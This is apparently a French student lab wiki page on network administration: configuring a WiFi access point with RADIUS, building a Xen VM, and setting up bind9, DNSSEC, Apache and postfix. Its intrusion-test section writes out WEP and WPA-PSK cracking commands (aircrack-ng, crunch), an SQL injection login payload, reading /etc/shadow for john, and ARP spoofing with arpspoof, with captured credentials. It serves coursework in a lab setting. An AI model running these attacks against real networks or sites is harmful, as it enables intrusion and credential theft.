Le but dans cette étant de permettre à la borne WiFi d'être controlé par WPA2-EAP,&lt;br /&gt;
&lt;br /&gt;
nous avons en sorte que l'identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire&lt;br /&gt;
&lt;br /&gt;
Pour ce faire :&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connecté par ssh à notre point d'accès&lt;br /&gt;
 ssh root@10.60.100.10 -c aes128-cbc&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de nous connecter sur le point d'accès wifi-ima5&lt;br /&gt;
&lt;br /&gt;
Une fois dessus nous avons effectué les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc&amp;gt;en&lt;br /&gt;
 wifi-ima5sc# (Après avoir tapé le mot de passe)&lt;br /&gt;
 wifi-ima5sc# config-term&lt;br /&gt;
 wifi-ima5sc(config)# aaa new-model&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group6 group radius_group6&lt;br /&gt;
 wifi-ima5sc(config-sg-radius)# radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secret_group6&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group6&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid morillon&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan306&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid Guest mode&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# ssid morillon&lt;br /&gt;
 &lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.6&lt;br /&gt;
 wifi-ima5sc(config-subif)#encapsulation dot1Q 6&lt;br /&gt;
 wifi-ima5sc(config-subif)#bridge-group 6&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54629</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54629"/>
				<updated>2020-12-14T17:25:19Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-1.png|600px|thumb|center|BSSID]]&lt;br /&gt;
&lt;br /&gt;
Nous effectuer la commande iwconfig pour retrouver le nom de notre interface wifi&lt;br /&gt;
&lt;br /&gt;
Grâce aux deux commandes suivantes lancées dans deux terminaux différents aircrack-ng. &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-2.png|600px|thumb|center|capture de paquets]]&lt;br /&gt;
&lt;br /&gt;
Comme on le voit sur les deux captures d'écran ci-dessous, nous retrouvons notre clé en Hexadecimal &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Groupe6-IMA2021-3.png|600px|thumb|center|clef trouvée]]&lt;br /&gt;
&lt;br /&gt;
==== Intrusion sur un serveur d’application Web ====&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette intrusion est de réussir à trouver un mot de passe sur le site honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Pour cela, plusieurs techniques ont été utilisées notamment les méthodes d'injection ou d'exploration de système fichiers&lt;br /&gt;
&lt;br /&gt;
La première étape consistait à utitliser la méthode d'injection en tapant sur http://honey.plil.info/ l'instruction &lt;br /&gt;
 Identifiant : 'OR 1=1#&lt;br /&gt;
 Mot de passe : 'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis d'obtenir le mot de passe admin de la page http://honey.plil.info/index.php&lt;br /&gt;
&lt;br /&gt;
 admin	*****	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Une fois connecté avec les identifiants administrateurs que nous venions de récupérer,&lt;br /&gt;
&lt;br /&gt;
nous avons utilisé la technique de parcours de fichier.&lt;br /&gt;
&lt;br /&gt;
On retrouver ainsi en créant le fichier  /etc/phpmyadmin/config-db.php&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de récupérer le fichier config-db.php&lt;br /&gt;
&lt;br /&gt;
Voici le contenu du fichier :&lt;br /&gt;
&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='*****';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306'; &lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
On disposait ainsi du mot de passe ainsi que de l'identifiant de la page http://honey.plil.info/phpmyadmin/&lt;br /&gt;
&lt;br /&gt;
en clair&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connectés en root &lt;br /&gt;
&lt;br /&gt;
Et nous avons obtenus le mot de passe au niveau de l'arborescence test/&lt;br /&gt;
&lt;br /&gt;
Arrivé à cette étape nous nous sommes connectés en ssh sur la machine physique&lt;br /&gt;
 ssh rex@honey.plil.info &lt;br /&gt;
 mot de passe : ****&lt;br /&gt;
&lt;br /&gt;
On a installé l'utilitaire shadow&lt;br /&gt;
&lt;br /&gt;
cat /etc/shadow&lt;br /&gt;
touch file&lt;br /&gt;
... Add first line in fil&lt;br /&gt;
.... Uncrypt with john&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Brute-force sur WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
Pour commencer, la carte passe en mode monitor :&lt;br /&gt;
    airmon-ng start wlan0&lt;br /&gt;
&lt;br /&gt;
Puis une analyse des réseaux wifi disponible est effectuée :&lt;br /&gt;
    airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On sélectionne notre réseau wifi (ici kracotte 6) avec son adresse MAC&lt;br /&gt;
    airodump-ng -c 3 --bssid 00:14:1B:60:8C:25 -w /home/pifou/Desktop/kracotte6 wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Handshaked_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Lorsque le handshake est obtenu, on compare grâce à un dictionnaire et la commande le fichier .cap récupéré: &lt;br /&gt;
     aicrack-ng -a2 -b 00:14:1B:60:8C:25 -w dico.txt kracotte06-02.cap&lt;br /&gt;
&lt;br /&gt;
Pour créer le dictionnaire, on utilise la commande crunch (comme on sait que le mot de passe est sur 8 caractères et forcément un nombre)&lt;br /&gt;
    crunch 8 8 0123456789 -o ./dico.txt&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_working_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
Finalement, après un peu moins d'1h d'attente :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Aircrack_done_grp6_2021.png]]&lt;br /&gt;
&lt;br /&gt;
==== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ====&lt;br /&gt;
Dans cette partie nous allons effectuer une attaque de type &amp;quot;homme du milieu&amp;quot; en faisant passé notre ordinateur pour la passerelle.&lt;br /&gt;
&lt;br /&gt;
Nous l'avons réalisé en ces étapes :&lt;br /&gt;
 1. Installation du paquetage dsniff sur notre ordinateur &lt;br /&gt;
 2. Modification du fichier /proc/sys/net/ipv4/ip_forward à 1&lt;br /&gt;
 3. Dans le terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 4. Dans un autre terminal : arpspoof -i eth0 -t 172.26.145.70 172.26.145.254&lt;br /&gt;
 5. Ouverture de wireshark sur l'eeepc et filtrage des paquets capturés sur le type hit&lt;br /&gt;
 6. Ouverture d'un site http (http://fabricarium.polytech-lille.fr)&lt;br /&gt;
 7. Observation sur wireshark des paquets (méthode GET)&lt;br /&gt;
 8. En essayant de nous connecter en remplissant les identifiants, nous avons eu ce résultat :&lt;br /&gt;
&lt;br /&gt;
 892    27.057577298    172.26.145.70    193.48.57.233    HTTP    1118    GET http://fabricarium-old.polytech-lille.fr/ HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
 987    38.734920206    172.26.145.70    193.48.57.233    HTTP    1383    POST http://fabricarium-old.polytech-lille.fr/users/sign_in.json HTTP/1.1  (application/json)&lt;br /&gt;
&lt;br /&gt;
 995    39.815022272    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 1523    99.814090449    172.26.145.70    193.48.57.233    HTTP    1444    POST http://webmailportal2.polytech-lille.fr/?_task=mail&amp;amp;_action=refresh HTTP/1.1  (application/x-www-form-urlencoded)&lt;br /&gt;
&lt;br /&gt;
 Frame 987: 1383 bytes on wire (11064 bits), 1383 bytes captured (11064 bits) on interface 0&lt;br /&gt;
 Ethernet II, Src: IntelCor_8f:f7:d3 (00:15:17:8f:f7:d3), Dst: HewlettP_01:ed:ce (5c:b9:01:01:ed:ce)&lt;br /&gt;
 Internet Protocol Version 4, Src: 172.26.145.70, Dst: 193.48.57.233&lt;br /&gt;
 Transmission Control Protocol, Src Port: 53876, Dst Port: 3128, Seq: 14532, Ack: 11925, Len: 1317&lt;br /&gt;
 Hypertext Transfer Protocol&lt;br /&gt;
 JavaScript Object Notation: application/json&lt;br /&gt;
    Object&lt;br /&gt;
        Member Key: user&lt;br /&gt;
            Object&lt;br /&gt;
                Member Key: email&lt;br /&gt;
                    String value: mail@mail.com&lt;br /&gt;
                    Key: email&lt;br /&gt;
                Member Key: password&lt;br /&gt;
                    String value: motdepasse&lt;br /&gt;
                    Key: password&lt;br /&gt;
            Key: user&lt;br /&gt;
&lt;br /&gt;
===Connexion de la VM au net===&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications par nos camarades et professeurs sur le serveur, nous avons eu la marche à suivre afin de configurer correctement la VM pour la connecter au web.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons modifié le fichier /etc/network/interfaces pour avoir la configuration suivante :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Screenshot_config_morillon.png ]]&lt;br /&gt;
&lt;br /&gt;
Nous avons donc comme configuration l'adresse web 193.48.57.183 vue par l'extérieur, un routage sur l'adresse 100.64.0.23 sur l'OSPF qui correspond au réseau virtuel via le VLAN 333 et l'adresse routeur 100.64.0.2. Le mot clé src indique que les paquets à destination du 193.x.x.x est à destination de l'ip du VLAN.&lt;br /&gt;
&lt;br /&gt;
Par la suite, une route doit être créée sur l'OSPF pour connecter correctement la VM sur le VLAN au web, une simple commande grâce au minicom :&lt;br /&gt;
    enable&lt;br /&gt;
      conf t&lt;br /&gt;
        vlan 333&lt;br /&gt;
        ip route 193.48.57.183 255.255.255.255 100.64.0.23&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour accéder via ssh à la machine, il suffit de s'y connecter via les identifiants habituels.&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MàJ du 16/11:&lt;br /&gt;
&lt;br /&gt;
Après vérification, une erreur de type couillon sur le glue record a probablement empêché le bon déroulement de l'opération : l'adresse ip renseignée était 193.57.48.183 au lieu de 193.48.57.183...&lt;br /&gt;
&lt;br /&gt;
MàJ du 30/11:&lt;br /&gt;
&lt;br /&gt;
Migration réussie&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12:&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications, le site est up et la page par défaut d'apache2 avec une petite modification pour confirmer le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12&lt;br /&gt;
&lt;br /&gt;
Plusieurs modifications ont été effectuées sur le ficiher db.morillon.website:&lt;br /&gt;
&lt;br /&gt;
Modification des A record, serveur mail et web, passage au serial contenant date de modification:&lt;br /&gt;
&lt;br /&gt;
    ;BIND data file for local loopback interface&lt;br /&gt;
    ;&lt;br /&gt;
    $TTL    86400&lt;br /&gt;
    @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                     2020120705         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                          86400 );       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
   @        IN      NS      ns1.morillon.website.&lt;br /&gt;
   @        IN      NS      ns6.gandi.net.&lt;br /&gt;
   @        IN	    MX	    100 mail&lt;br /&gt;
   mail	    IN	    A	    193.48.57.183&lt;br /&gt;
   ns1	    IN	    A       193.48.57.183&lt;br /&gt;
   www	    IN	    CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
mail passé en A car warning de bind9 alertant l'illégalité d'un mail en CNAME&lt;br /&gt;
&lt;br /&gt;
Ajout d'une zone inverse dans le fichier db.193: &lt;br /&gt;
&lt;br /&gt;
   ; BIND reverse data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL	604800&lt;br /&gt;
   @	IN	SOA	ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
        2020120703		; Serial&lt;br /&gt;
            604800		; Refresh&lt;br /&gt;
             86400		; Retry&lt;br /&gt;
           2419200		; Expire&lt;br /&gt;
            604800 );	; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @	IN	NS	ns1.&lt;br /&gt;
   183	IN	PTR	ns1.morillon.website.&lt;br /&gt;
   183	IN 	PTR	mail.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Avec une entrée pour chaque A record&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.options :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    	listen-on-v6 { any; };&lt;br /&gt;
        listen-on { any; };&lt;br /&gt;
        allow-recursion {127.0.0.1; 193.48.57.183; 217.70.177.40;};&lt;br /&gt;
        allow-query-cache {127.0.0.1; 193.48.57.183;};&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout de l'IP publique et du dns gandi pour les récursions, query-cache réduit pour empêcher usurpation&lt;br /&gt;
Des request denied dans le log confirme le bon fonctionnement :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    Dec  9 08:42:51 morillon named[1923]: client @0x7f1a44056fa0 88.80.186.137#43549 (193-48-57-183-5fd02192.spiderprobe.com): query (cache) \&lt;br /&gt;
    '193-48-57-183-5fd02192.spiderprobe.com/A/IN' denied&lt;br /&gt;
    Dec  9 11:07:56 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local :&lt;br /&gt;
&lt;br /&gt;
   ...&lt;br /&gt;
   zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
   };&lt;br /&gt;
   ...&lt;br /&gt;
&lt;br /&gt;
Pour zone de recherche inverse&lt;br /&gt;
&lt;br /&gt;
Modification du fichier de lancement /etc/default/bind9 pour un mode IPv4 pour l'instant:&lt;br /&gt;
    &lt;br /&gt;
    ...&lt;br /&gt;
    OPTIONS=&amp;quot; -4 -u bind&amp;quot;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
====Configuration du DNSSEC====&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec_morillon.png|right]]&lt;br /&gt;
&lt;br /&gt;
Pour configurer bind9 avec dnssec, nous générons d'abord les clés KSK et ZSK:&lt;br /&gt;
&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE morillon.website&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b -b 1024 -n ZONE morillon.website&lt;br /&gt;
&lt;br /&gt;
Pour plus de clarté :&lt;br /&gt;
    mv Kmorillon.website.+005+59473.key morillon.website-ksk.key&lt;br /&gt;
    mv Kmorillon.website.+005+59473.private morillon.website-ksk.private&lt;br /&gt;
&lt;br /&gt;
    mv Kmorillon.website.+005+52512.key morillon.website-zsk.key&lt;br /&gt;
    mv Kmorillon.website.+005+52512.private morillon.website-zsk.private&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier named.conf.options des options propres au DNSSEC:&lt;br /&gt;
    ...&lt;br /&gt;
    dnssec-enable yes;&lt;br /&gt;
    dnssec-validation yes;&lt;br /&gt;
    dnssec-lookaside yes;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier de zone db.morillon.website des clés: &lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-ksk.key&lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-zsk.key&lt;br /&gt;
&lt;br /&gt;
Incrémentation du revision code&lt;br /&gt;
&lt;br /&gt;
Signature du fichier de zone par l'utilitaire dnssec :&lt;br /&gt;
    dnssec-signzone -o morillon.website -k morillon.website-ksk db.morillon.website morillon.website-zsk&lt;br /&gt;
&lt;br /&gt;
''Nous avons eu un problème lors de la signature du fichier de zone, pour cela nous avons dû rajouter le timeout dans les fichiers de clés :&lt;br /&gt;
    morillon.website. '''3600''' IN DNSKEY 257 3 5 AwEAAfVX0ANdFDm...&lt;br /&gt;
&lt;br /&gt;
Apparemment à cause de l'option -L absente lors de la création des clés.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local pour changement du fichier de zone à charger :&lt;br /&gt;
    ... &lt;br /&gt;
    //file &amp;quot;/etc/bind/db.morillon.website&amp;quot;;&lt;br /&gt;
    file &amp;quot;/etc/bind/db.morillon.website.signed&amp;quot;;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Redémarrage du serveur bind9 avec la nouvelle configuration :&lt;br /&gt;
    service reload bind9&lt;br /&gt;
&lt;br /&gt;
Puis partage des clés KSK et ZSK avec gandi.net dans la zone registrar (utilisation d'un algorithme RSA/SHA1 (5))&lt;br /&gt;
&lt;br /&gt;
Lors d'un host -t any, nous obtenons :&lt;br /&gt;
    morillon.website has RRSIG record NSEC 5 2 86400 20210113121019 20201214121019 52512 morillon.website. nIhQAoZ568EQQ9eOl5H11UqnE49RW62604sey8RqnpVV1GWO4Rp5fkX4 7aOmVVljXVpnFvBfcfVYI430VHGKJUjUwSgSQSFFrLsKqETAp2PZFosH qEX1ml7c6U5SGpWdlkMtisLCxYfYn8/r2R25MZtrZsIsW543Zx6kXSzP 4CI=&lt;br /&gt;
    morillon.website has NSEC record mail.morillon.website. NS SOA MX RRSIG NSEC DNSKEY&lt;br /&gt;
    morillon.website has RRSIG record MX 5 2 86400 20210113121019 20201214121019 52512 morillon.website. GYKvgQe+6dfZkrevA3TXyJS82o77qWlRl/pNsE0I41Ku7FT1RgifPDll kXnqRl9G70iT4cRB9dNa/F+7RTcvY276in44lMkAzRlMWARG8+hYBhhq 5nvNN4kJpDZ7dKIpTc/wMu7SGiMZYKKrJOeK/pdarxI4ZHyqhDMiCW/X 9hE=&lt;br /&gt;
    morillon.website mail is handled by 100 mail.morillon.website.&lt;br /&gt;
    morillon.website has RRSIG record NS 5 2 86400 20210113121019 20201214121019 52512 morillon.website. RuAS5LH4UEmd+FIjzD522vwJcrGYlNuUuZYsDAFy0JiMGuOse5EKAWOi 01NWxfLAPGCDlj9Dj4QfyxSA+GhIJPEU25kcR44Nv/LQn1FsJZlQT8XM QkUnAXSlchrIlKg+XaSCTGjjfB1rE5Oba7PUwYgQ5CC7C7etvXegp2QV Ju0=&lt;br /&gt;
    morillon.website has RRSIG record SOA 5 2 86400 20210113121019 20201214121019 52512 morillon.website. i+0smnpl1ASGvURvV3lL/BuL6Zw/s3yjslMRUIKbOkE4tM/zgqF5RrTb gHOkj3PcZSSaO31O3vKUz6S0iPo/YWQvdaF0aHDcyvLQgCLiP6vpNwF+ mwOO821Jto39AM+3cuWCsytKECqKH4LoDMxkw/MUi6DJe40eAD8HEf2P 8iQ=&lt;br /&gt;
    morillon.website has SOA record ns1.morillon.website. postmaster.morillon.website. 2020120706 604800 86400 2419200 86400&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 52512 morillon.website. VGQyJDSf38xOBJymFK/DYLO/UYPEoIspsqZpPPnX+nPjUdR5Tw3tILPT 5AfZWAChlgQ8AnfLzxum/znpKI66EbeqTHvg1J/FjMBvlsyyLjwqjn6w u7JzquC/fbpq4HsskLFgpl1Z1zNuQAJB9xBGOJR8BpCHBRc8ubp1tUzy I2k=&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 59473 morillon.website. Tz3BwfoPt+loiqbWuQnbDdl57L6eXQ+dv+ZvXzcrvCSTXy/UKNRjs39d t6j6krwo4eZk6blXGgDEm93D67AmkQHmus9NYL9VgR0eG/NPHIodozzq aai4jXKwcOnk8O3d/nObyOERvGbnD9znUVGtgiUDCcY7UaXBogewFyCR Zxq69+FdFvmIXwriHHRRiaN/Bf4r/+djB46AcZEpbtvq1475BfJ6qYe/ VxW5odv1wcr9k8Sy/27LMbaHzdX9OWqdYLge3vfBRa8VMW+R57tx+M0p mtmOExUgc3mmnsVLP89L2M85MMTcbaup1RJIG4L33CaYEl9hOiaki4j8 CW5GHg==&lt;br /&gt;
    morillon.website has DNSKEY record 257 3 5 AwEAAfVX0ANdFDmDRKIBUMhso53F9LjZnc3lKHwHZHe3xiyLnFC+rQyc CQH+xg5g0UvDSLtoTFRtMiA4AyY6d8fywjmNFVluu64iDWyZkIVdiZLm XkfDdt4lz2+rxE1IkncbCYKkOk5cwkXYtxR/z/leOyZPX4i8Q1fhMfJG jUzNnZ1dATz0WGTb5qoGU9mEzVOH1WH4SkHc+acXkfBn6MtgR/DNJKDw 5huO3LMuA/ZyfwZU7lHhID97MMdpIwTIjd/nJLCjNY6rUP4OzZka7VjQ n/lOZ2UGMjOn+4QQqKDvmLohUOBsNFyY7PnSvsV9j5riNEZfuBx863QN 0PSBfK9cA4M=&lt;br /&gt;
    morillon.website has DNSKEY record 256 3 5 AwEAAaZUpNecSfAJ70amN3b4lcgpOAKXwbeJRogxxJEaqoSa0meQm6PY ZHAJFkxMMi78X+qVQeZr206VozCjPhysAWK6G45h/yY73Xzw1s0KzLwf L6FOhcn7KWzf2CIm6RfH5hwRLyuDriAaVVdKPxN/CkW9LIXRzm5LWSdz hqsZrhsz&lt;br /&gt;
    morillon.website name server ns6.gandi.net.&lt;br /&gt;
    morillon.website name server ns1.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Cela fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
===Apache2 et sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
Une fois le .csr et le .key créés, nous transmettons à gandi.net le CSR afin de générer un certificat signé.&lt;br /&gt;
&lt;br /&gt;
Nous avons configué notre serveur pour recevoir des mails, pour cela, nous avons installé 2 paquets :&lt;br /&gt;
&lt;br /&gt;
    postfix&lt;br /&gt;
    bsd-mailx&lt;br /&gt;
&lt;br /&gt;
Puis nous avons ajouté un alias dans le fichier /etc/aliases&lt;br /&gt;
    admin:     root&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de renseigner l'adresse du serveur mail dans le fichier DNS /etc/bind/db.morillon.website&lt;br /&gt;
    @     IN    MX 100 mail&lt;br /&gt;
